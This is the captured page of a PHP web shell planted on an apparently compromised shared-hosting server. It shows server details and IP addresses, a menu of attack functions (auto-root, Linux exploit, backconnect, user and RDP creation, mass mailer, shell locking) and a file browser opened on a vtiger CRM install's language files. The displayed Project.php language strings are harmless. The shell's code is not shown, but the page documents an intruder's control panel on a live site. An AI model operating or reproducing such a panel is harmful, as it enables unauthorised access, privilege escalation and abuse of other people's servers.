Linux webd002.cluster121.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.121.40.2 | : 216.73.216.88
Cant Read [ /etc/named.conf ]
7.2.34
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
letacommog /
crmleta /
languages /
en_gb /
[ HOME SHELL ]
Name
Size
Permission
Action
Settings
[ DIR ]
drwxr-xr-x
custom
[ DIR ]
drwx---r-x
Accounts.php
3.32
KB
-rw-r--r--
Assets.php
1.7
KB
-rw-r--r--
Calendar.php
11.37
KB
-rw-r--r--
Campaigns.php
3.61
KB
-rw-r--r--
Contacts.php
3.47
KB
-rw-r--r--
Documents.php
5.5
KB
-rw-r--r--
EmailTemplates.php
1.5
KB
-rw-r--r--
Emails.php
3.2
KB
-rw-r--r--
Events.php
5.25
KB
-rw-r--r--
Faq.php
1.54
KB
-rw-r--r--
Google.php
3.47
KB
-rw-r--r--
HelpDesk.php
4.96
KB
-rw-r--r--
Home.php
1.82
KB
-rw-r--r--
Import.php
6.46
KB
-rw-r--r--
Invoice.php
2.34
KB
-rw-r--r--
Leads.php
3.39
KB
-rw-r--r--
MailManager.php
9.95
KB
-rw-r--r--
Migration.php
1.81
KB
-rw-r--r--
Mobile.php
584
B
-rw-r--r--
ModComments.php
1.18
KB
-rw-r--r--
ModTracker.php
621
B
-rw-r--r--
PBXManager.php
1.08
KB
-rw-r--r--
PDFMaker.php
28.12
KB
-rw-r--r--
Portal.php
1.65
KB
-rw-r--r--
Potentials.php
3.59
KB
-rw-r--r--
PriceBooks.php
1.14
KB
-rw-r--r--
Products.php
5.7
KB
-rw-r--r--
Project.php
4.09
KB
-rw-r--r--
ProjectMilestone.php
1.47
KB
-rw-r--r--
ProjectTask.php
1.95
KB
-rw-r--r--
PurchaseOrder.php
3.17
KB
-rw-r--r--
Quotes.php
1.81
KB
-rw-r--r--
RecycleBin.php
1.74
KB
-rw-r--r--
Reports.php
12.99
KB
-rw-r--r--
Rss.php
1.17
KB
-rw-r--r--
SMSNotifier.php
1.16
KB
-rw-r--r--
SalesOrder.php
2.67
KB
-rw-r--r--
ServiceContracts.php
2.35
KB
-rw-r--r--
Services.php
2.01
KB
-rw-r--r--
Users.php
16.72
KB
-rw-r--r--
VTENotepad.php
724
B
-rw-r--r--
Vendors.php
2.28
KB
-rw-r--r--
Vtiger.php
94.39
KB
-rw-r--r--
WSAPP.php
582
B
-rw-r--r--
Webservices.php
864
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Project.php
<?php /*+********************************************************************************** * The contents of this file are subject to the vtiger CRM Public License Version 1.0 * ("License"); You may not use this file except in compliance with the License * The Original Code is: vtiger CRM Open Source * The Initial Developer of the Original Code is vtiger. * Portions created by vtiger are Copyright (C) vtiger. * All Rights Reserved. ************************************************************************************/ $languageStrings = array( 'Project' => 'Projects' , 'SINGLE_Project' => 'Project' , 'LBL_ADD_RECORD' => 'Add Project' , 'LBL_RECORDS_LIST' => 'Projects List' , 'LBL_PROJECT_INFORMATION' => 'Project Information' , 'Project Name' => 'Project Name' , 'Start Date' => 'Start Date' , 'Target End Date' => 'Target End Date' , 'Actual End Date' => 'Actual End Date' , 'Project No' => 'Project No.' , 'Target Budget' => 'Target budget' , 'Project Url' => 'URL' , 'Progress' => 'Progress' , 'Type' => 'Type' , 'Related to' => 'Related To' , 'LBL_TASKS_OPEN' => 'Tasks Open' , 'LBL_TASKS_DUE' => 'Tasks Due' , 'LBL_TASKS_COMPLETED' => 'Tasks Completed' , 'LBL_PEOPLE' => 'People' , 'LBL_CHARTS' => 'Charts' , 'LBL_TASKS_LIST' => 'Tasks List' , // TODO: Review 'LBL_MILESTONES' => 'Milestones' , // TODO: Review 'LBL_TASKS' => 'Tasks' , // TODO: Review 'LBL_STATUS_IS' => 'Status is' , // TODO: Review 'LBL_STATUS' => 'Status' , // TODO: Review 'LBL_TICKET_PRIORITY' => 'Priority' , // TODO: Review 'LBL_DOWNLOAD_FILE' => 'Download File' , // TODO: Review 'LBL_MILESTONES_LIST' => 'Milestones List' , 'LBL_TASKS_HIGH' => 'High Priority' , 'LBL_TASKS_NORMAL' => 'Normal Priority' , 'LBL_TASKS_LOW' => 'Low Priority' , 'LBL_TASKS_OTHER' => 'Other Priorities' , 'LBL_SELECT_PROGRESS' => 'Progress - All', 'LBL_SELECT_STATUS' => 'Status - All', //picklist values 'prospecting' => 'Prospecting', 'in progress' => 'In Progress', 'initiated' => 'Initiated', 'waiting for feedback' => 'Waiting for Feedback', 'on hold' => 'On Hold', 'archived' => 'Archived', 'completed' => 'Completed', 'delivered' => 'Delivered', 'administrative' => 'Administrative', 'operative' => 'Operative', 'other' => 'Other', 'low' => 'Low', 'normal' => 'Normal', 'high' => 'High', //Gantt chart 'LBL_CHART' => 'Chart', 'LBL_PROGRESS_CHART' => 'Progress Chart', 'LBL_TASK_NAME' => 'Task Name', 'LBL_START_DATE' => 'Start Date', 'LBL_END_DATE' => 'End Date', 'LBL_DURATION' => 'Duration', 'LBL_INFO' => 'Info', 'LBL_GANTT_INFO1' => 'Slide on right side of the task to expand duration', 'LBL_GANTT_INFO2' => 'Drag on the left or center of the task to change start and end date.', 'LBL_EDIT_PROJECT_TASK_STATUS_COLOR' => 'Edit Project Task Status Color', 'LBL_SELECT_PROJECT_TASK_STATUS_COLOR' => 'Select Project Task Status Color', 'LBL_SELECT_STATUS' => 'Select Status', 'LBL_EDIT_COLOR' => 'Edit Color', ); $jsLanguageStrings = array( 'JS_COLOR_SAVED_SUCESSFULLY' => 'Color Saved Successfully', );
Close